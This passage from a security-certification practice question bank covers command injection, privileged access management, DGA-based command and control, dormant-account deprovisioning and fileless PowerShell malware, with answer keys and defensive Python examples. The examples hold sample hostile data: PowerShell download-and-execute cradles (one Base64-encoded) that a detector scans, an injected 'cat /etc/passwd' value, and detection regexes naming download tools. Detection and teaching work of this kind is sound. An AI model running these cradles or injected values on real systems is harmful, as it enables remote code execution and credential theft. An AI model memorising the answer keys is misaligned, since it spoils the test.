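    anchor = acct.last_logon or acct.created
    return (as_of - anchor).days


def evaluate_accounts(accounts, as_of: date, inactivity_days: int = 180) -> list:
    """Apply the dormancy policy and return one auditable decision per
    account: disable dormant accounts (privileged ones flagged high priority),
    route dormant exempt accounts to manual review, leave active or
    already-disabled accounts alone."""
    decisions = []
    for a in accounts:
        days = inactive_days(a, as_of)
        if not a.enabled:
            action, reason = "none", "already disabled"
        elif days < inactivity_days:
            action, reason = "none", "active within policy window"
        elif a.exempt:
            action, reason = "review", "dormant but exempt; confirm justification"
        else:
            action = "disable"
            reason = "never logged on" if a.last_logon is None else "dormant"
        decisions.append({
            "account": a.name,
            "action": action,
            "priority": "high" if a.privileged and action != "none" else "normal",
            "inactive_days": days,
            "reason": reason,
            "as_of": as_of.isoformat(),
        })
    # Privileged dormant accounts sort first so the riskiest go in the first batch.
    decisions.sort(key=lambda d: (d["action"] == "none", d["priority"] != "high", d["account"]))
    return decisions


def to_disable(accounts, as_of: date) -> list:
    """Account names the automation would disable, in processing order."""
    return [d["account"] for d in evaluate_accounts(accounts, as_of) if d["action"] == "disable"]


if __name__ == "__main__":
    for d in evaluate_accounts(SAMPLE_ACCOUNTS, AS_OF):
        print(d)
```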
Question 114
During a penetration test, testers exploit a web application vulnerability that allows OS-level command execution via unsanitized input parameters. Which of the following controls would BEST prevent this type of attack?
A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values for web applications
D) Add additional firewall rules at the perimeter
Answer A
Explanation:
A Server-side input validation with parameterized commands
Command injection occurs when applications fail to properly sanitize user inputs before executing them as operating system commands. Implementing server-side input validation ensures all inputs conform to expected patterns, types, and lengths. Parameterized commands or prepared statements separate user input from executable instructions, neutralizing potential injection attacks.
Secure coding practices—including input validation, output encoding, and proper use of secure frameworks—reduce the likelihood of command injection vulnerabilities. Security testing, such as static (SAST) and dynamic (DAST) application security testing, identifies vulnerabilities during development or staging phases, allowing proactive remediation. Web application firewalls (WAFs) provide additional protection by filtering and blocking malicious requests at the application layer.
Behavioral monitoring and logging for suspicious input activity help detect attempted attacks, enabling rapid response and mitigation. Remediation includes patching vulnerable code, adhering to secure coding standards, and educating developers about secure programming techniques. Combined with proper input validation, these measures protect critical systems, maintain data integrity, and ensure compliance with industry standards, such as PCI DSS and OWASP ASVS.
B Enforce TLS encryption for all web traffic
TLS ensures confidentiality and integrity of communications but does not prevent command injection vulnerabilities at the application layer.
C Increase session timeout values for web applications
Session management mitigates risks like session hijacking but does not address command injection vulnerabilities.
D Add additional firewall rules at the perimeter
Firewalls control network traffic but cannot inspect application-layer input or prevent command execution through vulnerable applications.
Question 115
A SOC analyst discovers that a server has been compromised and a reverse shell has been established using stolen administrative credentials. Which of the following controls would MOST effectively prevent similar attacks in the future?
A) Implement privileged access management (PAM) with just-in-time (JIT) access
B) Increase password complexity for all accounts
C) Deploy signature-based antivirus on the server
D) Disable all remote access capabilities
Answer A
Explanation:
A Implement privileged access management (PAM) with just-in-time (JIT) access
Privileged Access Management (PAM) with JIT access is a proactive control that minimizes the risk of attackers exploiting stolen credentials. JIT ensures administrative privileges are granted only when needed and for a limited duration, so a stolen credential carries administrative rights only inside an approved, time-bound window; this shrinks the opportunity for an attacker to open a reverse shell, move laterally, or establish persistence with that credential. PAM solutions provide detailed session logging, real-time monitoring, and auditing to detect and respond to anomalous activity quickly.
This control enforces least privilege principles while maintaining operational efficiency. Integration with multi-factor authentication (MFA) strengthens security by ensuring elevated access requires multiple forms of verification. Combining PAM with EDR, SIEM, and threat intelligence allows correlation of activity with anomalous patterns, enabling rapid detection and mitigation of ongoing attacks. PAM also supports compliance with frameworks such as SOX, HIPAA, and PCI DSS by providing auditable records of privileged access.
B Increase password complexity for all accounts
Complex passwords reduce brute-force risks but do not mitigate attacks using already compromised credentials.
C Deploy signature-based antivirus on the server
Antivirus may detect known malware but cannot prevent attacks using legitimate system tools to establish reverse shells.
D Disable all remote access capabilities
Disabling remote access may hinder operational efficiency and business continuity. PAM with JIT access provides controlled, secure access without disrupting legitimate administrative workflows.
Question 116
A SOC analyst notices unusual outbound traffic from several endpoints to external IP addresses over non-standard ports. DNS logs indicate queries to a large number of seemingly random domains. Which of the following BEST describes the threat?
A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Standard software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system
Answer A
Explanation:
A Malware using a domain generation algorithm (DGA) for command-and-control
The observed scenario strongly indicates malware employing a domain generation algorithm (DGA) for command-and-control (C2) communication. DGAs dynamically create pseudo-random domain names at scheduled intervals to maintain contact between infected endpoints and external C2 servers. This evasion technique helps malware bypass traditional static blacklists, firewalls, and other network security defenses.
Indicators of DGA activity include unusually high DNS query volumes, randomized or high-entropy domain names, and outbound connections to IP addresses over uncommon ports. This behavior is distinct from normal network traffic, as legitimate services typically connect to known hosts on standard ports, and queries resolve predictable domains. Analysts can identify DGA activity using behavioral analytics, anomaly detection, and correlation with threat intelligence feeds to highlight suspicious patterns.
Detection techniques include monitoring DNS query entropy, observing frequency and volume patterns, and tracking resolution failure rates: because the operator registers only a few of the domains the algorithm produces, infected hosts generate an unusually high proportion of NXDOMAIN responses. Memory-resident malware often triggers DGA communications without leaving persistent disk artifacts, making endpoint detection and response (EDR) telemetry crucial for monitoring process execution, network connections, and system calls. Analysts may also deploy sandboxing and packet inspection tools to observe malware behavior in controlled environments to understand its C2 methodology and communication frequency.
Mitigation requires a multi-layered approach: isolating infected endpoints to prevent further compromise, blocking identified malicious domains and IP addresses, removing malware from affected systems, and conducting forensic investigations. Reverse engineering DGAs allows security teams to preemptively predict future domain generations and block them before malware can reach its C2 infrastructure. Threat intelligence feeds enhance detection by providing insight into known DGA algorithms and associated malware families.
Additional preventive measures include network segmentation to limit lateral movement, anomaly-based detection systems for continuous monitoring, strict egress filtering, and application whitelisting. Educating users about suspicious behaviors, maintaining up-to-date endpoint protections, and continuous monitoring of DNS and network traffic patterns further reinforce defenses. Organizations should establish documented procedures for isolating infected systems, performing incident response, and reporting breaches to ensure coordinated and effective mitigation.
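The detection heuristics above (label entropy, query volume, resolution failure rate) can be run directly over resolver logs. The following Python is an added example, not part of the original question set: it scores each source host in a small constructed DNS log and flags hosts whose queried labels are high-entropy and mostly unresolvable. The log lines, the thresholds and the naive second-level-label extraction are assumptions for illustration; production use would tune thresholds against a local baseline and use a public-suffix list.

```python
import math
from collections import Counter, defaultdict

# Constructed resolver log (source host, queried name, response code). Sample data, not from the page.
DNS_LOG = """\
10.0.0.15 www.microsoft.com NOERROR
10.0.0.15 cdn.office.net NOERROR
10.0.0.23 xk7qpz2mvrl9.com NXDOMAIN
10.0.0.23 q9d3hbt0ywpu.net NXDOMAIN
10.0.0.23 jz4lx8vqwn3e.info NXDOMAIN
10.0.0.23 p0mr6czyvkq2.com NXDOMAIN
10.0.0.23 b8twqzlm5xvh.org NOERROR
10.0.0.42 mail.google.com NOERROR
10.0.0.42 docs.google.com NOERROR
"""


def shannon_entropy(text: str) -> float:
    """Bits per character; a 12-character label with 12 distinct characters scores log2(12) = 3.58."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_label(qname: str) -> str:
    """Label left of the public suffix (naive: second-to-last label), the part a DGA randomises.
    Assumption: two-label suffixes such as co.uk are not handled here."""
    parts = qname.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def score_hosts(log: str, entropy_threshold: float = 3.4,
                nxdomain_threshold: float = 0.5, min_queries: int = 4) -> dict:
    """Per source host: mean label entropy, NXDOMAIN ratio and a combined DGA verdict.
    The thresholds are assumed starting points to tune against the local baseline."""
    per_host = defaultdict(list)
    for line in log.splitlines():
        if not line.strip():
            continue
        host, qname, rcode = line.split()
        per_host[host].append((qname, rcode))

    verdicts = {}
    for host, entries in per_host.items():
        labels = [registrable_label(q) for q, _ in entries]
        mean_entropy = sum(shannon_entropy(lbl) for lbl in labels) / len(labels)
        nx_ratio = sum(1 for _, r in entries if r == "NXDOMAIN") / len(entries)
        verdicts[host] = {
            "queries": len(entries),
            "mean_label_entropy": round(mean_entropy, 2),
            "nxdomain_ratio": round(nx_ratio, 2),
            # All three conditions together: volume, randomness, and failed resolutions.
            "suspect_dga": (len(entries) >= min_queries
                            and mean_entropy >= entropy_threshold
                            and nx_ratio >= nxdomain_threshold),
        }
    return verdicts


if __name__ == "__main__":
    for host, verdict in score_hosts(DNS_LOG).items():
        print(host, verdict)
```

Only 10.0.0.23 is flagged: its five labels average 3.58 bits per character and four of five queries returned NXDOMAIN, while the Microsoft and Google names on the other hosts score well under 3 bits and resolve. Entropy alone would also flag legitimate CDN hostnames, which is why the NXDOMAIN ratio and minimum query count are required together.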
B Standard software update traffic
Software updates typically communicate with known servers over standard ports. Randomized DNS queries or connections to non-standard ports do not align with legitimate update behaviors. Detection of high-entropy, frequent DNS queries strongly differentiates malicious activity from routine update processes.
C Distributed denial-of-service (DDoS) attack
DDoS attacks aim to overwhelm services to degrade availability. While high-volume traffic is characteristic of DDoS, the described scenario involves covert, targeted outbound communications and dynamic domain resolution, which is inconsistent with volumetric attack patterns.
D Misconfigured internal monitoring system
Misconfigurations can generate anomalous network traffic, but they rarely produce high-frequency, randomized DNS queries combined with external connections over uncommon ports. The volume, randomness, and targeted nature of the traffic in this scenario strongly indicate malware rather than operational misconfiguration.
Question 117
An internal audit reveals several privileged service accounts have not been used for over six months but still possess administrative rights. Which of the following controls would MOST effectively mitigate this risk?
A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on all endpoints
Answer A
Explanation:
A Implement automated account deprovisioning
Inactive privileged accounts represent a significant security risk because attackers can exploit dormant credentials to gain unauthorized access or maintain persistence. Automated account deprovisioning systematically disables or removes accounts after a predefined period of inactivity, reducing the attack surface while ensuring enforcement of least privilege. This control is proactive, scalable, and aligns with security governance and compliance requirements.
Integration with identity governance and privileged access management (PAM) systems ensures consistent application of policies, enables audit logging, and simplifies compliance reporting for regulatory standards such as HIPAA, PCI DSS, and SOX. Automated deprovisioning reduces reliance on manual reviews, which are prone to human error, and ensures dormant accounts are consistently removed across large-scale environments.
The process of automated deprovisioning also complements other security controls, including multi-factor authentication (MFA), role-based access control (RBAC), and anomaly detection. Monitoring attempts to reactivate disabled accounts or unauthorized login attempts can provide early warning of potential insider threats or compromised credentials. Organizations can combine automated deprovisioning with periodic account reviews and privilege recertification to maintain a robust security posture.
Automated deprovisioning has operational benefits as well. It reduces administrative overhead, ensures that high-risk accounts are effectively managed, and supports a principle of least privilege by maintaining active access only for users with operational needs. Security teams can focus on monitoring for anomalous behaviors rather than manually tracking dormant accounts, which enhances overall incident response capabilities.
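The deprovisioning logic described for Questions 113 and 117 is short enough to show end to end. The Python below is an added example, not code from the original page or from any identity product: it evaluates a constructed account export against inactivity limits, exempts break-glass accounts from automatic disablement (routing them to review instead), and emits one JSON audit record per decision. It goes slightly beyond the question by applying a tighter limit to privileged accounts than to standard ones; the account data, the 90- and 180-day limits and the fixed evaluation time are all assumptions.

```python
import json
from datetime import datetime, timedelta, timezone

# Constructed account export (not from the original page). In Active Directory these fields
# would come from lastLogonTimestamp and group membership via an IGA or PAM connector.
ACCOUNTS = [
    {"name": "svc_backup",      "privileged": True,  "break_glass": False, "last_logon": "2024-01-10T00:00:00Z"},
    {"name": "svc_sql",         "privileged": True,  "break_glass": False, "last_logon": "2024-09-01T00:00:00Z"},
    {"name": "svc_legacy",      "privileged": True,  "break_glass": False, "last_logon": None},
    {"name": "emergency_admin", "privileged": True,  "break_glass": True,  "last_logon": "2023-06-01T00:00:00Z"},
    {"name": "jdoe",            "privileged": False, "break_glass": False, "last_logon": "2024-05-01T00:00:00Z"},
]

# Fixed evaluation time so the run is reproducible; a scheduled job would use datetime.now(timezone.utc).
NOW = datetime(2024, 9, 15, tzinfo=timezone.utc)
PRIVILEGED_LIMIT = timedelta(days=90)   # assumed policy: shorter window for admin and service accounts
STANDARD_LIMIT = timedelta(days=180)    # assumed policy: six months for everyone else


def parse_timestamp(value):
    """ISO 8601 with a trailing Z; None means the account has never logged on."""
    if value is None:
        return None
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def decide(account: dict, now: datetime = NOW) -> dict:
    """Return the deprovisioning decision plus an audit record for one account."""
    last = parse_timestamp(account["last_logon"])
    days_inactive = None if last is None else (now - last).days
    limit = PRIVILEGED_LIMIT if account["privileged"] else STANDARD_LIMIT
    dormant = last is None or (now - last) > limit

    if account["break_glass"]:
        # Never auto-disable emergency access; send it to manual recertification instead.
        action, reason = "review", "break-glass account exempt from automatic disable"
    elif last is None:
        action, reason = "disable", "account has never logged on"
    elif dormant:
        action, reason = "disable", f"inactive {days_inactive} days, limit {limit.days}"
    else:
        action, reason = "keep", f"last logon {days_inactive} days ago, limit {limit.days}"

    return {"name": account["name"], "privileged": account["privileged"],
            "days_inactive": days_inactive, "action": action, "reason": reason,
            "evaluated_at": now.isoformat()}


def run(accounts=ACCOUNTS, now: datetime = NOW) -> dict:
    """Map account name -> action; the printed JSON lines are the audit trail."""
    decisions = [decide(a, now) for a in accounts]
    for d in decisions:
        print(json.dumps(d))   # forward to the SIEM or compliance evidence store
    return {d["name"]: d["action"] for d in decisions}


if __name__ == "__main__":
    run()
```

In this data set svc_backup (249 days idle, privileged) and svc_legacy (never logged on) are disabled, svc_sql is kept, jdoe is kept because a standard account is allowed 180 days, and emergency_admin is held for review. Treating "never logged on" as dormant matters: such accounts are common leftovers from provisioning and are exactly the kind the audit in the question would surface.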
B Increase password complexity requirements for service accounts
Password complexity is a preventive control against guessing and brute-force attacks, but it does not mitigate risks associated with dormant or unused accounts. Even strong passwords are ineffective if the account remains active and exposed, for example through credential theft or reuse.
C Disable all external SSH access
SSH restrictions reduce external attack vectors but do not address the risk posed by dormant accounts within the internal network.
D Deploy full disk encryption on all endpoints
Encryption protects data at rest but does not reduce the risk associated with administrative account misuse or dormant privileges.
Question 118
During a penetration test, testers exploit a web application vulnerability that allows OS-level command execution through unsanitized input fields. Which of the following controls would BEST prevent this type of attack?
A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter
Answer A
Explanation:
A Server-side input validation with parameterized commands
Command injection occurs when user-supplied input is concatenated into an operating system command and executed, allowing shell metacharacters in the input to introduce additional commands. Server-side input validation ensures that all inputs conform to expected formats, types, and lengths, rejecting anything outside an allow-list before it reaches the command. Parameterized commands separate user input from executable code, the way prepared statements do for SQL: the input is passed as a discrete argument rather than as part of a shell string, so it cannot change the structure of the command.
Secure coding practices, including consistent validation and output encoding, reduce vulnerabilities across the application stack. Static and dynamic application security testing (SAST/DAST) identify code weaknesses during development, allowing remediation before deployment. Web application firewalls (WAFs) provide additional protection by filtering malicious inputs at the application layer, offering defense-in-depth against command injection attempts.
Behavioral monitoring is crucial for early detection of malicious activity. Logging input validation failures, anomalous execution attempts, and unexpected command triggers allows analysts to detect attacks in progress. Remediation includes patching vulnerable code, updating frameworks, and implementing secure development training for developers. Periodic penetration testing and security audits validate that controls are effective and vulnerabilities are addressed promptly.
The combination of server-side validation, parameterized commands, secure coding practices, WAFs, and continuous monitoring provides a comprehensive mitigation strategy against OS-level command execution attacks. These measures protect system integrity, maintain compliance with security standards, and reduce the risk of data breaches or operational disruption.
B Enforce TLS encryption for all web traffic
TLS encryption ensures confidentiality in transit but does not address injection vulnerabilities at the application layer.
C Increase session timeout values
Session timeout adjustments mitigate session hijacking but do not prevent command injection.
D Add additional firewall rules at the perimeter
Firewalls control network traffic but cannot inspect application-layer inputs; additional firewall rules alone are insufficient.
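Questions 114 and 118 describe the same weakness, so one added example serves both. The Python below is not code from the original page: it places the vulnerable pattern (user input concatenated into a shell string) beside the hardened one (an allow-list check followed by an argument vector with no shell). The ping use case, the hostname regex and the parameter values are assumptions; the vulnerable function returns the string it would have handed to a shell instead of executing it, so the demonstration is safe to run.

```python
import re
import subprocess

# Constructed request parameters for the demonstration (not from the original page).
BENIGN_HOST = "example.com"
INJECTED_HOST = "example.com; cat /etc/passwd"

# Allow-list for the 'host' parameter: DNS labels or dotted IPv4 literals, bounded length.
# Anything with spaces, ';', '|', '`', '$' or quotes fails this before a command is built.
_HOST_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def vulnerable_command(host: str) -> str:
    """The anti-pattern from the question: input pasted into a shell command string.
    Handed to os.system() or subprocess with shell=True, the shell would run both commands.
    Returned rather than executed here so the example stays harmless."""
    return "ping -c 1 " + host


def is_valid_host(host: str) -> bool:
    """Server-side allow-list validation; client-side checks are bypassable."""
    return bool(_HOST_RE.match(host))


def hardened_argv(host: str) -> list:
    """Validation plus a fixed argument vector, the OS-command analog of a parameterized query.
    Raises ValueError instead of silently passing bad input along."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host parameter: {host!r}")
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> subprocess.CompletedProcess:
    """shell=False (the default): argv elements are delivered to ping verbatim, never parsed by a shell."""
    return subprocess.run(hardened_argv(host), capture_output=True, text=True, timeout=5)


if __name__ == "__main__":
    print("shell string the vulnerable code would run:", vulnerable_command(INJECTED_HOST))
    print("argv the hardened code builds:", hardened_argv(BENIGN_HOST))
    try:
        hardened_argv(INJECTED_HOST)
    except ValueError as exc:
        print("blocked:", exc)
```

The two defences are independent and both are worth keeping: the allow-list rejects the payload outright, and the argument vector guarantees that even an unexpected value can only ever be the single argument ping receives. A web application firewall in front of this code is defence in depth, not a substitute for either.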
Question 119
A SOC analyst detects that a server has been compromised and a reverse shell has been established using stolen administrative credentials. Which of the following controls would MOST effectively prevent similar attacks in the future?
A) Implement privileged access management (PAM) with just-in-time (JIT) access
B) Increase password complexity for all accounts
C) Deploy signature-based antivirus on the server
D) Disable all remote access capabilities
Answer A
Explanation:
A Implement privileged access management (PAM) with just-in-time (JIT) access
PAM with JIT access is a proactive control that minimizes the risk of credential misuse. JIT ensures administrative privileges are granted only when needed and for a limited duration, reducing the attack window and preventing attackers from leveraging stolen credentials for reverse shells, lateral movement, or persistence.
PAM systems provide robust session logging, monitoring, and auditing. They allow security teams to detect suspicious activities in real time and maintain an audit trail for compliance with standards like SOX, PCI DSS, and HIPAA. Integration with multi-factor authentication (MFA) enhances security by requiring additional verification steps for privileged access.
JIT access enforces least privilege principles while maintaining operational efficiency. Security teams can apply granular control over which users access which resources, for how long, and under what conditions. Combining PAM with EDR, SIEM, and anomaly detection enables rapid detection and remediation of suspicious activity. PAM provides a controlled environment for administrators, so that even if credentials are compromised, they carry no administrative rights outside an approved, time-bound elevation window, and every elevation is recorded for review.
B Increase password complexity for all accounts
Strong passwords reduce brute-force risk but do not prevent attacks using already compromised credentials.
C Deploy signature-based antivirus on the server
Traditional antivirus may detect known malware but is largely ineffective against attacks using legitimate system tools, such as reverse shells or living-off-the-land techniques.
D Disable all remote access capabilities
Disabling remote access may hinder legitimate operations. PAM with JIT access allows secure, controlled access without operational disruption, balancing security and business continuity.
Question 120
A security analyst observes abnormal PowerShell execution on multiple endpoints. Scripts are obfuscated and communicate with unknown external IP addresses. Antivirus scans do not detect any malicious files. Which of the following BEST describes the threat?
A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack
Answer A
Explanation:
A Fileless malware leveraging living-off-the-land techniques
Fileless malware resides primarily in memory and executes malicious actions using legitimate tools already present on the system, such as PowerShell or Windows Management Instrumentation (WMI), often launched from a macro-enabled Office document. The scenario describes obfuscated scripts communicating with unknown external IPs without generating detectable files on disk, indicative of living-off-the-land (LotL) techniques.
Fileless malware is particularly difficult to detect with signature-based antivirus solutions because it does not write persistent binaries to disk. Indicators include abnormal script execution, unexpected process creation, unusual network communications, and deviations from baseline system behavior. Behavioral analytics, endpoint detection and response (EDR), and memory forensics are essential for detection.
Mitigation includes isolating affected endpoints, terminating malicious processes, analyzing scripts for malicious intent, and remediating compromised systems. Preventive measures involve application whitelisting, enforcing least privilege, enabling PowerShell logging (module logging, script block logging, transcription), and restricting execution policies. Threat intelligence integration allows identification and blocking of malicious domains or IP addresses used for C2 communication.
Living-off-the-land attacks are challenging because they exploit legitimate administrative tools, making detection difficult. Organizations must adopt a defense-in-depth strategy combining proactive monitoring, behavioral analytics, user training, network segmentation, and incident response capabilities. Comprehensive logging, alerting, and correlation of network and endpoint activity are critical for early detection and rapid response.
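With script block logging enabled (Event ID 4104), the obfuscated scripts in the scenario are visible to the analyst even though antivirus found no file. The Python below is an added example, not part of the original page or any vendor's detection content: it takes a few constructed script block samples, decodes any -EncodedCommand payload (Base64 of UTF-16LE text, which is how PowerShell encodes it), and scores each block against common living-off-the-land indicators such as download cradles, in-memory execution, hidden windows and string-concatenation obfuscation. The sample blocks, the indicator list and the alert threshold are assumptions for illustration.

```python
import base64
import re

# Constructed Event ID 4104 script block texts (not from the original page). The second one is
# built here by encoding a download cradle exactly as PowerShell expects for -EncodedCommand.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7:8443/a')"
SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users | Sort-Object LastWriteTime",
    "powershell.exe -nop -w hidden -enc "
    + base64.b64encode(_CRADLE.encode("utf-16le")).decode("ascii"),
    "$a='Down'+'loadStr'+'ing'; IEX ((New-Object Net.WebClient).$a('http://198.51.100.9/x.ps1'))",
    "Invoke-Command -ComputerName fileserver01 -ScriptBlock { Get-Service }",
]

# -e, -ec, -enc and -EncodedCommand all accept a Base64 blob (PowerShell matches prefixes).
ENCODED_FLAG = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Assumed indicator set; real rule sets are broader and tuned to the environment.
INDICATORS = {
    "download_cradle": re.compile(r"Net\.WebClient|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I),
    "in_memory_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "string_concat_obfuscation": re.compile(r"'[^']*'\s*\+\s*'[^']*'"),
    "external_ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I),
}


def decode_encoded_command(block: str) -> str:
    """Append the decoded -EncodedCommand payload so indicators match the real script, not the blob."""
    match = ENCODED_FLAG.search(block)
    if not match:
        return block
    try:
        decoded = base64.b64decode(match.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return block
    return block + " ;; DECODED: " + decoded


def analyze(block: str) -> dict:
    """Score one script block; two or more indicators together is the assumed alert threshold."""
    text = decode_encoded_command(block)
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if ENCODED_FLAG.search(block):
        hits.insert(0, "encoded_command")
    return {"indicators": hits, "score": len(hits), "suspicious": len(hits) >= 2}


def analyze_all(blocks=SCRIPT_BLOCKS) -> list:
    return [analyze(b) for b in blocks]


if __name__ == "__main__":
    for block, result in zip(SCRIPT_BLOCKS, analyze_all()):
        print(result["suspicious"], result["indicators"], block[:60])
```

The two administrative commands score zero, while both attacker blocks are flagged: the encoded one only after decoding (the Base64 blob itself matches nothing), and the concatenated one because Net.WebClient and IEX survive even though "DownloadString" has been split into pieces. That is the practical reason to log and decode script blocks rather than to match on command-line strings alone.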
B Standard ransomware encrypting files
Ransomware typically encrypts files and leaves a ransom note, unlike memory-resident, script-based fileless malware.
C Phishing emails delivering malicious attachments
While phishing may serve as an initial infection vector, the ongoing obfuscated execution indicates post-compromise activity typical of fileless malware.
D Distributed denial-of-service (DDoS) attack
DDoS attacks target availability rather than executing memory-resident scripts or performing covert C2 communications.